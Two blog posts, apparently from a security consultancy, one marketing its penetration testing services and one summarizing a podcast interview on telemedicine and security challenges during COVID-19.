Who you get doesn’t have to be what you get, as people so often think. From project management workflows and practitioner guides to standardized pentest checklists and testing playbooks, at NetSPI we have formalized quality assurance and oversight so we can deliver consistent results, no matter who your assigned NetSPI security consultant is. With these standardized processes in place, when new vulnerabilities are identified, we are able to quickly mobilize and study the attack scenario, and if appropriate, we add that specific vulnerability to our pentest checklists for future assessments.

Having said that, every situation has its nuances. While understanding that no organization is the same, there may be some commonalities between industries, like similar regulatory bodies to comply with, for example. This allows pentesters to put some standardization into their process while allowing for customization and flexibility that is unique to the client environment from a business or technical perspective.

Technology/IT Should be Automated to Increase Manual Pentesting

Automated scanning is foundational to any penetration testing program. It’s how an organization handles the thousands of results from those scans that is crucial as there will be duplicates, false positives, and many, many data points, oftentimes delivered in spreadsheets or PDFs. Your internal security/IT team is then tasked with sifting through, sorting, and evaluating that data. Is that administrative work the best use of their time?

In my opinion, your internal team should focus on finding solutions for effective and fast vulnerability remediation, rather than spending their time heads down in administrative tasks. It’s up to your pentesting team to identify and communicate the priority vulnerabilities, not hand you a document and wish you luck. Look for a penetration testing provider who has tools in place to automate pentest reporting functions and deliver results that can be easily sorted and acted upon so that the majority of human capital investment is focused on finding and fixing vulnerabilities. A favorite quote of mine from NetSPI product manager Jake Reynolds exemplifies the mindset of those individuals working to solve the technical complexities of vulnerability management (VM), “I want to hack and secure the largest companies in the world…I participate in solving real world problems that affect companies and people across the globe.”

A Focus on Internal R&D Will Strengthen the Entire Security Community

Being able to collaborate with a team is critical in our client relationships. We instill that collaborative mindset through an intense and immersive training program, NetSPI University, for entry-level security testing talent. Why dedicate so much time to continued education and mentorship? At NetSPI, we are consistently asked to see around corners and penetration test more and more complex environments. So, training and collaboration are key to helping us grow and scale pentesting talent to meet our industry’s evolving needs.

Training and collaboration can’t, and isn’t, just a NetSPI initiative. Collaboration and innovation are key to evolving as an enterprise and as an industry. As I wrote in this blog post, pentesters are intensely creative and have highly curious technical minds, and our team strongly believes that the effort we place in research and development with our colleagues should be shared with the broader security community. Case in point? The NetSPI blog is a treasure trove of information for the pentesting community at large, along with the content on our open source portal.

Final words on this subject: Penetration testing services are the same by definition, but none are created equal. When hiring a penetration testing service provider to test your applications, cloud, network, or perform a red teaming exercise, think beyond whether they can simply identify vulnerabilities. Consider pentesting talent, processes, technology, and culture to ensure you’re getting the most value out of your partnership.


Overcoming Challenges of COVID-19 with Telemedicine and New Technology Solutions

In a recent episode of Agent of Influence, I talked with Anubhav Kaul, Chief Medical Officer at Mattapan Community Health Center near Boston about not only some of the medical challenges they are facing during COVID-19, but also some of the software and security challenges. I wanted to share some of his insights in a blog post, but you can also listen to our interview here, on Spotify, Apple Music, or wherever you listen to podcasts.

COVID-19 Impacts on Telemedicine

Telemedicine has been available and used for multiple years and takes many different forms. For example, your doctor calling you on the phone and updating you on your results is telemedicine, receiving results through an electronic portal is telemedicine, or receiving feedback from your provider over a text message platform is telemedicine.

However, COVID-19 has drastically changed many doctors’ reliance on telemedicine to be the primary platform for how they provide care to their patients. According to Kaul, 90 percent of care being delivered by Mattapan is currently being delivered via telemedicine, including treatment of chronic conditions and urgent concerns. This has been made possible largely because the payers, both public and private, recognized the essential need of working in the current climate and have been able to help Mattapan receive reimbursement for providing telemedicine-based care.

The challenges Mattapan is currently experiencing are mostly around adoption of video and phone technology enabling remote treatment, since many clinicians have never had training on how to conduct effective telemedicine appointments.

In addition, while there is a tremendous amount of care that can be provided to patients without physically seeing them, the ability to be in the presence of patients and evaluate them in person is sometimes irreplaceable. In part to combat this challenge, Mattapan is leveraging medical devices to help manage certain conditions by patients from home, many of which automatically send data directly to doctors as it’s collected, including devices to measure blood pressure, glucose, weight, and more.

Kaul has also noticed that doctor-patient relationships, like so many relationships, are struggling with the lack of social connection, one of the most gratifying parts of providing care in person. With new technological developments, people are in general more distracted by their technology from the person right in front of them, including doctors when seeing patients. This may even be exacerbated as doctors leverage telemedicine to provide treatment and try to connect with patients over video and phone.

Staying Secure While Providing Remote Treatment

Providers have always had to focus on ensuring their communications with patients are secure and HIPAA compliant. Many clinicians want to provide the best care to their patients, which may sometimes mean giving out their cell phone numbers to patients or texting their patients to allow for accessibility of care. While they have every intention of doing the right thing for the patient, these are not necessarily considered safe modes of communicating with patients. They may be easy and accessible, but there is a level of risk when it comes to using unofficial platforms.

Using encrypted emails and online patient portals to send text messages are more secure options, even if they may not be as convenient for clinicians and patients.

Even outside of a pandemic situation, doctors and clinics will always face this security challenge that sometimes stands in conflict: trying to protect the patient’s information and trying to protect the patient’s health by providing accessible care. And at the same time, not putting themselves or their clinic at risk when using unsecure modes of communication.

Mattapan uses Epic, an Electronic Medical Record (EMR) system that is integrated with Zoom technology to provide telemedicine via video and which allows patients to send pictures that are then uploaded into their patient portal and medical record. However, most visits will continue to be phone-based, primarily because of accessibility. While getting people to adopt new technology is always a challenge, Mattapan is working to increase video adoption to give all their patients the full functionality that that medium provides.

As Mattapan and clinics around the world leverage new technology and medical devices to treat patients remotely, they don’t necessarily know the security threats these technology solutions pose because they’ve never used them before, especially to this extent. While hospital IT and security teams are working to quickly test and set up these systems, there are risks associated.

As a clinician, Kaul is not necessarily constantly thinking about security risks, but more about the most accessible way to provide care to Mattapan’s patients. He sees this time as presenting an opportunity in the market for telemedicine software solutions and medical devices, so that doctors can continue to treat patients remotely – and even offer broader and improved treatments.

I’ve completed a fair number of security assessments for electronic medical devices and organizations that build hardware leveraged by doctors, and in my experience, doctors hate security because it interferes with their ability to conduct the job at hand. And in certain cases, the job at hand takes significantly higher priority than the potential security risks. For example, I don’t think any doctor wants to have to enter a password before they can use a surgical device, because sometimes every second matters when it comes to the life of a patient.

Increasing Challenges of Patient Authentication

Another challenge when it comes to treating patients remotely is that of patient authentication. For example, you may be trying to monitor the blood pressure of your patient and you send them home with a device that’s continually sending data back, but how do you know that data is for your patient and not their child, sibling or someone else? Kaul acknowledges that there’s no easy way to authenticate this and it’s very easy for patients to cheat the system if they want to. These are challenges that need more focus and attention, of which they’re probably not getting right now because usability is taking a much higher priority than security.

Mattapan is focused on making sure any patient interactions they’re having are as reliable as possible, especially during this time. However, there are unique challenges. For example, sometimes they rely on talking with family members of people who can’t speak English, but maybe that family member doesn’t have full jurisdiction about their health care information and making decisions about their health care. These types of scenarios are opportunities for software and medical device companies to fill, but they may not be given the highest priority at this time.

Prescribing Prescriptions Virtually

Doctors have long been able to electronically prescribe most medications, but during the COVID-19 pandemic, they are also allowed to prescribe other medications that previously required a paper prescription, including controlled substance pain medications, certain psychiatric medications, and medications meant to treat addictions.

Being able to prescribe controlled substances electronically has made the process more accessible, especially in these current times, but it has also added security challenges. These challenges include making sure that the patient is properly identified, and they are receiving the prescriptions in a secure manner from the pharmacy. This level of accessibility is great for the patient and for the provider, but certain guidelines have been adopted to make sure this is done in a standardized fashion and to make sure that doctors are still connecting with these patients over the phone or video to see how their care is going, whether it’s for pain management or treating them for addiction-based disorders.

During these uncertain times, doctors and hospitals are working to increase accessibility of care, but with accessibility comes the responsibility of making sure that parameters of appropriately treating patients are in place – along with the appropriate security measures.

To listen to the full podcast, click here, or you can find Agent of Influence on Spotify, Apple Music, or wherever you listen to podcasts.

Discover why security operations teams choose NetSPI.